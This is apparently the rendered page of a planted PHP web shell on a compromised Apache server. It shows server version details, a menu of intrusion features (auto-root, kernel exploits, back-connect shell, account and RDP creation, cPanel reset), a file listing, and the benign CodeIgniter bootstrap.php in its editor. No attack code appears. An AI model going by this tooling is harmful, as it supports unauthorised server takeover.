Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cai /
system /
[ HOME SHELL ]
Name
Size
Permission
Action
API
[ DIR ]
drwxr-x--x
Autoloader
[ DIR ]
drwxr-x--x
CLI
[ DIR ]
drwxr-x--x
Cache
[ DIR ]
drwxr-x--x
Commands
[ DIR ]
drwxr-x--x
Config
[ DIR ]
drwxr-x--x
Cookie
[ DIR ]
drwxr-x--x
Debug
[ DIR ]
drwxr-x--x
Email
[ DIR ]
drwxr-x--x
Encryption
[ DIR ]
drwxr-x--x
Entity
[ DIR ]
drwxr-x--x
Events
[ DIR ]
drwxr-x--x
Exceptions
[ DIR ]
drwxr-x--x
Files
[ DIR ]
drwxr-x--x
Filters
[ DIR ]
drwxr-x--x
Format
[ DIR ]
drwxr-x--x
HTTP
[ DIR ]
drwxr-x--x
Honeypot
[ DIR ]
drwxr-x--x
I18n
[ DIR ]
drwxr-x--x
Images
[ DIR ]
drwxr-x--x
Log
[ DIR ]
drwxr-x--x
Modules
[ DIR ]
drwxr-x--x
Pager
[ DIR ]
drwxr-x--x
RESTful
[ DIR ]
drwxr-x--x
Router
[ DIR ]
drwxr-x--x
Security
[ DIR ]
drwxr-x--x
Session
[ DIR ]
drwxr-x--x
Test
[ DIR ]
drwxr-x--x
ThirdParty
[ DIR ]
drwxr-x--x
Throttle
[ DIR ]
drwxr-x--x
Typography
[ DIR ]
drwxr-x--x
Validation
[ DIR ]
drwxr-x--x
View
[ DIR ]
drwxr-x--x
core
[ DIR ]
drwxr-x--x
database
[ DIR ]
drwxr-x--x
fonts
[ DIR ]
drwxr-x--x
helpers
[ DIR ]
drwxr-x--x
language
[ DIR ]
drwxr-x--x
libraries
[ DIR ]
drwxr-x--x
.htaccess
118
B
-rwxr-x--x
BaseModel.php
47.38
KB
-rwxr-x--x
CodeIgniter.php
28.32
KB
-rwxr-x--x
Common.php
34.08
KB
-rwxr-x--x
ComposerScripts.php
4.55
KB
-rwxr-x--x
Controller.php
4.26
KB
-rwxr-x--x
Entity.php
484
B
-rwxr-x--x
Model.php
23.79
KB
-rwxr-x--x
bootstrap.php
4.22
KB
-rwxr-x--x
index.html
131
B
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bootstrap.php
<?php /** * This file is part of CodeIgniter 4 framework. * * (c) CodeIgniter Foundation <admin@codeigniter.com> * * For the full copyright and license information, please view * the LICENSE file that was distributed with this source code. */ use CodeIgniter\Config\DotEnv; use Config\Autoload; use Config\Modules; use Config\Paths; use Config\Services; /* * --------------------------------------------------------------- * SETUP OUR PATH CONSTANTS * --------------------------------------------------------------- * * The path constants provide convenient access to the folders * throughout the application. We have to setup them up here * so they are available in the config files that are loaded. */ // The path to the application directory. if (! defined('APPPATH')) { /** * @var Paths $paths */ define('APPPATH', realpath(rtrim($paths->appDirectory, '\\/ ')) . DIRECTORY_SEPARATOR); } // The path to the project root directory. Just above APPPATH. if (! defined('ROOTPATH')) { define('ROOTPATH', realpath(APPPATH . '../') . DIRECTORY_SEPARATOR); } // The path to the system directory. if (! defined('SYSTEMPATH')) { /** * @var Paths $paths */ define('SYSTEMPATH', realpath(rtrim($paths->systemDirectory, '\\/ ')) . DIRECTORY_SEPARATOR); } // The path to the writable directory. if (! defined('WRITEPATH')) { /** * @var Paths $paths */ define('WRITEPATH', realpath(rtrim($paths->writableDirectory, '\\/ ')) . DIRECTORY_SEPARATOR); } // The path to the tests directory if (! defined('TESTPATH')) { /** * @var Paths $paths */ define('TESTPATH', realpath(rtrim($paths->testsDirectory, '\\/ ')) . DIRECTORY_SEPARATOR); } /* * --------------------------------------------------------------- * GRAB OUR CONSTANTS & COMMON * --------------------------------------------------------------- */ if (! defined('APP_NAMESPACE')) { require_once APPPATH . 'Config/Constants.php'; } // Require app/Common.php file if exists. if (is_file(APPPATH . 'Common.php')) { require_once APPPATH . 'Common.php'; } // Require system/Common.php require_once SYSTEMPATH . 'Common.php'; /* * --------------------------------------------------------------- * LOAD OUR AUTOLOADER * --------------------------------------------------------------- * * The autoloader allows all of the pieces to work together in the * framework. We have to load it here, though, so that the config * files can use the path constants. */ if (! class_exists('Config\Autoload', false)) { require_once SYSTEMPATH . 'Config/AutoloadConfig.php'; require_once APPPATH . 'Config/Autoload.php'; require_once SYSTEMPATH . 'Modules/Modules.php'; require_once APPPATH . 'Config/Modules.php'; } require_once SYSTEMPATH . 'Autoloader/Autoloader.php'; require_once SYSTEMPATH . 'Config/BaseService.php'; require_once SYSTEMPATH . 'Config/Services.php'; require_once APPPATH . 'Config/Services.php'; // Use Config\Services as CodeIgniter\Services if (! class_exists('CodeIgniter\Services', false)) { class_alias('Config\Services', 'CodeIgniter\Services'); } // Initialize and register the loader with the SPL autoloader stack. Services::autoloader()->initialize(new Autoload(), new Modules())->register(); // Now load Composer's if it's available if (is_file(COMPOSER_PATH)) { /* * The path to the vendor directory. * * We do not want to enforce this, so set the constant if Composer was used. */ if (! defined('VENDORPATH')) { define('VENDORPATH', realpath(ROOTPATH . 'vendor') . DIRECTORY_SEPARATOR); } require_once COMPOSER_PATH; } // Load environment settings from .env files into $_SERVER and $_ENV require_once SYSTEMPATH . 'Config/DotEnv.php'; $env = new DotEnv(ROOTPATH); $env->load(); // Always load the URL helper, it should be used in most of apps. helper('url'); /* * --------------------------------------------------------------- * GRAB OUR CODEIGNITER INSTANCE * --------------------------------------------------------------- * * The CodeIgniter class contains the core functionality to make * the application run, and does all of the dirty work to get * the pieces all working together. */ $app = Services::codeigniter(); $app->initialize(); return $app;
Close